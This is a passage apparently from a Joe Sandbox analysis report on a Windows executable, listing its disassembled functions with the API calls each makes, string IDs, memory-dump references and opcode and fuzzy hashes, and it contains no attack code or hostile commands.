                                                      • ReleaseDC.USER32(?), ref: 00F7D8A3
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.2047535020.0000000000F21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F20000, based on PE: true
                                                      • Associated: 00000000.00000002.2047520348.0000000000F20000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2047581108.0000000000FBC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2047581108.0000000000FE2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2047618845.0000000000FEC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2047636057.0000000000FF4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_f20000_0XLuA614VK.jbxd
                                                      Similarity
                                                      • API ID: CapsDesktopDeviceReleaseWindow
                                                      • String ID:
                                                      • API String ID: 2889604237-0
                                                      • Opcode ID: 33420e4fd4121378ccaca173302b0e44302906e0da25f07541bc7e51b3456294
                                                      • Instruction ID: 02098bb32bcd59cd4152d192f9b7639228c2c58a9dd797f4e1206ff13b9c2fde
                                                      • Opcode Fuzzy Hash: 33420e4fd4121378ccaca173302b0e44302906e0da25f07541bc7e51b3456294
                                                      • Instruction Fuzzy Hash: 43E01AB5C00208DFCB41AFA4D948A6EBBB6FB48310F108109E80AE7250C7384901BF91
                                                      Function 00F7D86C Relevance: 6.0, APIs: 4, Instructions: 18COMMON
                                                      Download Yara Rule
                                                      APIs
                                                      • GetDesktopWindow.USER32 ref: 00F7D86C
                                                      • GetDC.USER32(00000000), ref: 00F7D876
                                                      • GetDeviceCaps.GDI32(00000000,0000000C), ref: 00F7D882
                                                      • ReleaseDC.USER32(?), ref: 00F7D8A3
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.2047535020.0000000000F21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F20000, based on PE: true
                                                      • Associated: 00000000.00000002.2047520348.0000000000F20000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2047581108.0000000000FBC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2047581108.0000000000FE2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2047618845.0000000000FEC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2047636057.0000000000FF4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_f20000_0XLuA614VK.jbxd
                                                      Similarity
                                                      • API ID: CapsDesktopDeviceReleaseWindow
                                                      • String ID:
                                                      • API String ID: 2889604237-0
                                                      • Opcode ID: 7d238a4e955a8d731f8da6122ebf3bcaec1fa2626e5f9bfcb85decd6ef7f1a45
                                                      • Instruction ID: 3f80c063a2566fed2f3e1714d43e31bb31216b61a8b50551da0e7716b4d3e469
                                                      • Opcode Fuzzy Hash: 7d238a4e955a8d731f8da6122ebf3bcaec1fa2626e5f9bfcb85decd6ef7f1a45
                                                      • Instruction Fuzzy Hash: 6BE09AB5D04208DFCB51AFA4D948A6EBBB6BB48311F148549E94AE7250C7385901BF90
                                                      Function 00F94D87 Relevance: 5.5, APIs: 1, Strings: 2, Instructions: 230shareCOMMON
                                                      Download Yara Rule
                                                      APIs
                                                        • Part of subcall function 00F27620: _wcslen.LIBCMT ref: 00F27625
                                                      • WNetUseConnectionW.MPR(00000000,?,0000002A,00000000,?,?,0000002A,?), ref: 00F94ED4
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.2047535020.0000000000F21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F20000, based on PE: true
                                                      • Associated: 00000000.00000002.2047520348.0000000000F20000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2047581108.0000000000FBC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2047581108.0000000000FE2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2047618845.0000000000FEC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2047636057.0000000000FF4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_f20000_0XLuA614VK.jbxd
                                                      Similarity
                                                      • API ID: Connection_wcslen
                                                      • String ID: *$LPT
                                                      • API String ID: 1725874428-3443410124
                                                      • Opcode ID: 046c26d97a23765cd9b858c4f8ee9539081d7f7c2772617a3bba12aee7b6af2a
                                                      • Instruction ID: 3b8c979278fe44f816257019038bdf17aca4f8f34a0398f2a8dfcf15140da20b
                                                      • Opcode Fuzzy Hash: 046c26d97a23765cd9b858c4f8ee9539081d7f7c2772617a3bba12aee7b6af2a
                                                      • Instruction Fuzzy Hash: 3C918275E002159FDB14DF54C484EAABBF1BF54318F188099E80A9F3A2D735ED86DB90
                                                      Function 00F4E27D Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 189COMMON
                                                      Download Yara Rule
                                                      APIs
                                                      • __startOneArgErrorHandling.LIBCMT ref: 00F4E30D
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.2047535020.0000000000F21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F20000, based on PE: true
                                                      • Associated: 00000000.00000002.2047520348.0000000000F20000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2047581108.0000000000FBC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2047581108.0000000000FE2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2047618845.0000000000FEC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2047636057.0000000000FF4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_f20000_0XLuA614VK.jbxd
                                                      Similarity
                                                      • API ID: ErrorHandling__start
                                                      • String ID: pow
                                                      • API String ID: 3213639722-2276729525
                                                      • Opcode ID: 0b1466e5b49c7ca93b480bffbbbb3b6dca63701e6de93e13a36f8c693c5b49d8
                                                      • Instruction ID: cabd683f0ce63fc297175b1020fb8b45723db8b4984a61d005fed20a5a6d3048
                                                      • Opcode Fuzzy Hash: 0b1466e5b49c7ca93b480bffbbbb3b6dca63701e6de93e13a36f8c693c5b49d8
                                                      • Instruction Fuzzy Hash: BD515D61E0C30697CB167B14ED0277A3FA4FB40762F304958EDD5432E9EB358C99BA46
                                                      Function 00F3E187 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 184COMMON
                                                      Download Yara Rule
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.2047535020.0000000000F21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F20000, based on PE: true
                                                      • Associated: 00000000.00000002.2047520348.0000000000F20000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2047581108.0000000000FBC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2047581108.0000000000FE2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2047618845.0000000000FEC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2047636057.0000000000FF4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_f20000_0XLuA614VK.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID: #
                                                      • API String ID: 0-1885708031
                                                      • Opcode ID: d3942b605a8b56775fcc8d8e717c89f70610cf37b1f3a2bff60cfb59319d6c8c
                                                      • Instruction ID: 7ea5399800a741f86912c4c112e21beee4051ebf944ecb4d0ad29b6dd0445c55
                                                      • Opcode Fuzzy Hash: d3942b605a8b56775fcc8d8e717c89f70610cf37b1f3a2bff60cfb59319d6c8c
                                                      • Instruction Fuzzy Hash: C3513635D00246DFDB19DF28C481ABA7BA8EF19320F248097EC659B2C0D638DD53EB52
                                                      Function 00F3F291 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 144sleepCOMMON
                                                      Download Yara Rule
                                                      APIs
                                                      • Sleep.KERNEL32(00000000), ref: 00F3F2A2
                                                      • GlobalMemoryStatusEx.KERNEL32(?), ref: 00F3F2BB
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.2047535020.0000000000F21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F20000, based on PE: true
                                                      • Associated: 00000000.00000002.2047520348.0000000000F20000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2047581108.0000000000FBC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2047581108.0000000000FE2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2047618845.0000000000FEC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2047636057.0000000000FF4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_f20000_0XLuA614VK.jbxd
                                                      Similarity
                                                      • API ID: GlobalMemorySleepStatus
                                                      • String ID: @
                                                      • API String ID: 2783356886-2766056989
                                                      • Opcode ID: d19f68185cbdb7eaf288e2fea5bf513c30f4f71fa438b066a2967dfeda5bdd8e
                                                      • Instruction ID: 03447029a40fefc542dfdd2ba21006a86874e23a6510e9c115a0b857a4299557
                                                      • Opcode Fuzzy Hash: d19f68185cbdb7eaf288e2fea5bf513c30f4f71fa438b066a2967dfeda5bdd8e
                                                      • Instruction Fuzzy Hash: 06512771408748ABD320AF50EC86BAFBBF8FB84300F81895DF1D941195EB748529DBA6
                                                      Function 00FA5745 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 125COMMON
                                                      Download Yara Rule
                                                      APIs
                                                      • CharUpperBuffW.USER32(?,?,?,00000003,?,?), ref: 00FA57E0
                                                      • _wcslen.LIBCMT ref: 00FA57EC
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.2047535020.0000000000F21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F20000, based on PE: true
                                                      • Associated: 00000000.00000002.2047520348.0000000000F20000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2047581108.0000000000FBC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2047581108.0000000000FE2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2047618845.0000000000FEC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2047636057.0000000000FF4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_f20000_0XLuA614VK.jbxd
                                                      Similarity
                                                      • API ID: BuffCharUpper_wcslen
                                                      • String ID: CALLARGARRAY
                                                      • API String ID: 157775604-1150593374
                                                      • Opcode ID: 778c62719b336ad6d13a2e3d4bd666af89f56ac6df3bbab6f067724b49fe4b1e
                                                      • Instruction ID: af8ce2116cc6c6a5dec39f8ef9674d61dd197bec4c34bdcb543dcffcd428afe3
                                                      • Opcode Fuzzy Hash: 778c62719b336ad6d13a2e3d4bd666af89f56ac6df3bbab6f067724b49fe4b1e
                                                      • Instruction Fuzzy Hash: 0A419371E002099FCB14EFA9C8819FEBBB5FF5A720F144069E505A7252E7789D81EF90
                                                      Function 00F9D0F4 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 98networkCOMMON
                                                      Download Yara Rule
                                                      APIs
                                                      • _wcslen.LIBCMT ref: 00F9D130
                                                      • InternetCrackUrlW.WININET(?,00000000,00000000,0000007C), ref: 00F9D13A
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.2047535020.0000000000F21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F20000, based on PE: true
                                                      • Associated: 00000000.00000002.2047520348.0000000000F20000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2047581108.0000000000FBC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2047581108.0000000000FE2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2047618845.0000000000FEC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2047636057.0000000000FF4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_f20000_0XLuA614VK.jbxd
                                                      Similarity
                                                      • API ID: CrackInternet_wcslen
                                                      • String ID: |
                                                      • API String ID: 596671847-2343686810
                                                      • Opcode ID: 346b3ff291f520e5090a618428cd8368d4d9b43edc1aaef14852f7e0ea051a33
                                                      • Instruction ID: 611b73bae8d589cbc02e3c71bfabf8a0a0fb25f9ac8db3c7dde089fcedaa129d
                                                      • Opcode Fuzzy Hash: 346b3ff291f520e5090a618428cd8368d4d9b43edc1aaef14852f7e0ea051a33
                                                      • Instruction Fuzzy Hash: 34318F71C01219ABDF11EFA4DC85EEE7FB9FF04300F100019F815A6162DB35AA46EB60
                                                      Function 00FB356C Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 96COMMON
                                                      Download Yara Rule
                                                      APIs
                                                      • DestroyWindow.USER32(?,?,?,?), ref: 00FB3621
                                                      • MoveWindow.USER32(?,?,?,?,?,00000001,?,?,?), ref: 00FB365C
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.2047535020.0000000000F21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F20000, based on PE: true
                                                      • Associated: 00000000.00000002.2047520348.0000000000F20000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2047581108.0000000000FBC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2047581108.0000000000FE2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2047618845.0000000000FEC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2047636057.0000000000FF4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_f20000_0XLuA614VK.jbxd
                                                      Similarity
                                                      • API ID: Window$DestroyMove
                                                      • String ID: static
                                                      • API String ID: 2139405536-2160076837
                                                      • Opcode ID: c2373abfc5ff82601b0441da775788041bcb18047dd56acbd91c20db2df3a0c1
                                                      • Instruction ID: 2f7aa862b0b98802687dee913f1a1489358578adf4108f90896712235c7c3c65
                                                      • Opcode Fuzzy Hash: c2373abfc5ff82601b0441da775788041bcb18047dd56acbd91c20db2df3a0c1
                                                      • Instruction Fuzzy Hash: BE319071510604AEDB24DF29DC80FFB73A9FF88760F108619F8A5D7290DA34AD81EB60
                                                      Function 00FB4537 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 95windowCOMMON
                                                      Download Yara Rule
                                                      APIs
                                                      • SendMessageW.USER32(?,00001132,00000000,?), ref: 00FB461F
                                                      • SendMessageW.USER32(?,00001105,00000000,00000000), ref: 00FB4634
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.2047535020.0000000000F21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F20000, based on PE: true
                                                      • Associated: 00000000.00000002.2047520348.0000000000F20000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2047581108.0000000000FBC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2047581108.0000000000FE2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2047618845.0000000000FEC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2047636057.0000000000FF4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_f20000_0XLuA614VK.jbxd
                                                      Similarity
                                                      • API ID: MessageSend
                                                      • String ID: '
                                                      • API String ID: 3850602802-1997036262
                                                      • Opcode ID: bf4f9bbaf4dbb5de497d78a9aeed8a2b0c5e13b2d93036f11cca8396692db7cf
                                                      • Instruction ID: d33954805a749f1f4ec4197cf6a52147ad7e5b5b72980b6e0c2c1a8f0bd5141d
                                                      • Opcode Fuzzy Hash: bf4f9bbaf4dbb5de497d78a9aeed8a2b0c5e13b2d93036f11cca8396692db7cf
                                                      • Instruction Fuzzy Hash: EF313B75A006199FDB14CF6AC980BDABBB5FF49300F144069E904AB382D770A941DF90
                                                      Function 00FB31EF Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 72windowCOMMON
                                                      Download Yara Rule
                                                      APIs
                                                      • SendMessageW.USER32(00000000,00000143,00000000,?), ref: 00FB327C
                                                      • SendMessageW.USER32(?,0000014E,00000000,00000000), ref: 00FB3287
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.2047535020.0000000000F21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F20000, based on PE: true
                                                      • Associated: 00000000.00000002.2047520348.0000000000F20000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2047581108.0000000000FBC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2047581108.0000000000FE2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2047618845.0000000000FEC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2047636057.0000000000FF4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_f20000_0XLuA614VK.jbxd
                                                      Similarity
                                                      • API ID: MessageSend
                                                      • String ID: Combobox
                                                      • API String ID: 3850602802-2096851135
                                                      • Opcode ID: 3f322a1fc1e0cea838b0ae86ea142be277d9420c00d50c462e1f798f4ed54261
                                                      • Instruction ID: f7271ac46a626541fbfb9392f1c684240d4a182772a1b2a673607eb5b5a26d73
                                                      • Opcode Fuzzy Hash: 3f322a1fc1e0cea838b0ae86ea142be277d9420c00d50c462e1f798f4ed54261
                                                      • Instruction Fuzzy Hash: F911B2717402087FEF219E95DC81EFB376AEB983A4F104229F91897290D6719D51ABA0
                                                      Function 00FB3710 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 67COMMON
                                                      Download Yara Rule
                                                      APIs
                                                        • Part of subcall function 00F2600E: CreateWindowExW.USER32(?,?,?,?,?,?,?,?,?,?,00000000,?), ref: 00F2604C
                                                        • Part of subcall function 00F2600E: GetStockObject.GDI32(00000011), ref: 00F26060
                                                        • Part of subcall function 00F2600E: SendMessageW.USER32(00000000,00000030,00000000), ref: 00F2606A
                                                      • GetWindowRect.USER32(00000000,?), ref: 00FB377A
                                                      • GetSysColor.USER32(00000012), ref: 00FB3794
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.2047535020.0000000000F21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F20000, based on PE: true
                                                      • Associated: 00000000.00000002.2047520348.0000000000F20000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2047581108.0000000000FBC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2047581108.0000000000FE2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2047618845.0000000000FEC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2047636057.0000000000FF4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_f20000_0XLuA614VK.jbxd
                                                      Similarity
                                                      • API ID: Window$ColorCreateMessageObjectRectSendStock
                                                      • String ID: static
                                                      • API String ID: 1983116058-2160076837
                                                      • Opcode ID: 2cb46d1c7c747a61c89ff7638e6a1b11e35a5c0e903fec25b9e1dc3adede076f
                                                      • Instruction ID: be50bbffcdbedf5c473520c86d724890ddd8782169069612b286e4e63e24a1b6
                                                      • Opcode Fuzzy Hash: 2cb46d1c7c747a61c89ff7638e6a1b11e35a5c0e903fec25b9e1dc3adede076f
                                                      • Instruction Fuzzy Hash: B81129B2650209AFDB10DFA9CC45EEA7BB8FB08354F104614F955E2250EB35E851EBA0
                                                      Function 00F9CD1E Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 66networkCOMMON
                                                      Download Yara Rule
                                                      APIs
                                                      • InternetOpenW.WININET(?,00000000,00000000,00000000,00000000), ref: 00F9CD7D
                                                      • InternetSetOptionW.WININET(00000000,00000032,?,00000008), ref: 00F9CDA6
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.2047535020.0000000000F21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F20000, based on PE: true
                                                      • Associated: 00000000.00000002.2047520348.0000000000F20000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2047581108.0000000000FBC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2047581108.0000000000FE2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2047618845.0000000000FEC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2047636057.0000000000FF4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_f20000_0XLuA614VK.jbxd
                                                      Similarity
                                                      • API ID: Internet$OpenOption
                                                      • String ID: <local>
                                                      • API String ID: 942729171-4266983199
                                                      • Opcode ID: 322efa6436aad4ec583ee589e2987964c16ad08fe1bc2adb739d095101e60a9b
                                                      • Instruction ID: f5bdaf24fc60385077d34c0ac4a4ac048f2137298b39d7c79a82fd3121cae60e
                                                      • Opcode Fuzzy Hash: 322efa6436aad4ec583ee589e2987964c16ad08fe1bc2adb739d095101e60a9b
                                                      • Instruction Fuzzy Hash: AB11C6B26056367AEB384B668C85FE7BE6CEF127B4F104227B12983180D7709840E6F0
                                                      Function 00FB3429 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 64windowCOMMON
                                                      Download Yara Rule
                                                      APIs
                                                      • GetWindowTextLengthW.USER32(00000000), ref: 00FB34AB
                                                      • SendMessageW.USER32(?,000000B1,00000000,00000000), ref: 00FB34BA
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.2047535020.0000000000F21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F20000, based on PE: true
                                                      • Associated: 00000000.00000002.2047520348.0000000000F20000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2047581108.0000000000FBC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2047581108.0000000000FE2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2047618845.0000000000FEC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2047636057.0000000000FF4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_f20000_0XLuA614VK.jbxd
                                                      Similarity
                                                      • API ID: LengthMessageSendTextWindow
                                                      • String ID: edit
                                                      • API String ID: 2978978980-2167791130
                                                      • Opcode ID: 925ff56ee59a3f7b1a001e337f8cbda88abc8e204a0e2700ba27272afde435f0
                                                      • Instruction ID: aaf97433e8fda04b699165efff7de27d080f5d54490cd6911e074cf5c12f7eb3
                                                      • Opcode Fuzzy Hash: 925ff56ee59a3f7b1a001e337f8cbda88abc8e204a0e2700ba27272afde435f0
                                                      • Instruction Fuzzy Hash: 08116D71540108EBEB218E66DC84AEB376AEF05374F504324F965931E4C775DC51BF50
                                                      Function 00F86C86 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 56COMMON
                                                      Download Yara Rule
                                                      APIs
                                                        • Part of subcall function 00F29CB3: _wcslen.LIBCMT ref: 00F29CBD
                                                      • CharUpperBuffW.USER32(?,?,?), ref: 00F86CB6
                                                      • _wcslen.LIBCMT ref: 00F86CC2
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.2047535020.0000000000F21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F20000, based on PE: true
                                                      • Associated: 00000000.00000002.2047520348.0000000000F20000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2047581108.0000000000FBC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2047581108.0000000000FE2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2047618845.0000000000FEC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2047636057.0000000000FF4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_f20000_0XLuA614VK.jbxd
                                                      Similarity
                                                      • API ID: _wcslen$BuffCharUpper
                                                      • String ID: STOP
                                                      • API String ID: 1256254125-2411985666
                                                      • Opcode ID: cd7883b74f30b5a6c60b3297b0b1a9060a163f8f371f5b456cda3bc5cf0368f6
                                                      • Instruction ID: 9c3c6eb1c3a3ec5710cbbf6a8a5a9279448a388dd35d30901a4dc46245cfec4e
                                                      • Opcode Fuzzy Hash: cd7883b74f30b5a6c60b3297b0b1a9060a163f8f371f5b456cda3bc5cf0368f6
                                                      • Instruction Fuzzy Hash: A801C433A145278BCB21BFBDDC909FF77A5FB61720B500524E852D7191EA75D900E750
                                                      Function 00F81CDE Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 52windowCOMMON
                                                      Download Yara Rule
                                                      APIs
                                                        • Part of subcall function 00F29CB3: _wcslen.LIBCMT ref: 00F29CBD
                                                        • Part of subcall function 00F83CA7: GetClassNameW.USER32(?,?,000000FF), ref: 00F83CCA
                                                      • SendMessageW.USER32(?,000001A2,000000FF,?), ref: 00F81D4C
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.2047535020.0000000000F21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F20000, based on PE: true
                                                      • Associated: 00000000.00000002.2047520348.0000000000F20000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2047581108.0000000000FBC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2047581108.0000000000FE2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2047618845.0000000000FEC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2047636057.0000000000FF4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_f20000_0XLuA614VK.jbxd
                                                      Similarity
                                                      • API ID: ClassMessageNameSend_wcslen
                                                      • String ID: ComboBox$ListBox
                                                      • API String ID: 624084870-1403004172
                                                      • Opcode ID: 9e3ab9c3654f26c633227e8a0c9ec72faebac52ed6095f9cff80f6043a13f01a
                                                      • Instruction ID: f2712d88f153a571a9b32ec515a6e75d9a5fb544bcd2c23862ff1ace7cd9544c
                                                      • Opcode Fuzzy Hash: 9e3ab9c3654f26c633227e8a0c9ec72faebac52ed6095f9cff80f6043a13f01a
                                                      • Instruction Fuzzy Hash: F4012872A00228ABCB04FBA0DC51EFE73A8FB46760F040619F822572D1EA745909A7A0
                                                      Function 00F81BD8 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 50windowCOMMON
                                                      Download Yara Rule
                                                      APIs
                                                        • Part of subcall function 00F29CB3: _wcslen.LIBCMT ref: 00F29CBD
                                                        • Part of subcall function 00F83CA7: GetClassNameW.USER32(?,?,000000FF), ref: 00F83CCA
                                                      • SendMessageW.USER32(?,00000180,00000000,?), ref: 00F81C46
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.2047535020.0000000000F21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F20000, based on PE: true
                                                      • Associated: 00000000.00000002.2047520348.0000000000F20000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2047581108.0000000000FBC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2047581108.0000000000FE2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2047618845.0000000000FEC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2047636057.0000000000FF4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_f20000_0XLuA614VK.jbxd
                                                      Similarity
                                                      • API ID: ClassMessageNameSend_wcslen
                                                      • String ID: ComboBox$ListBox
                                                      • API String ID: 624084870-1403004172
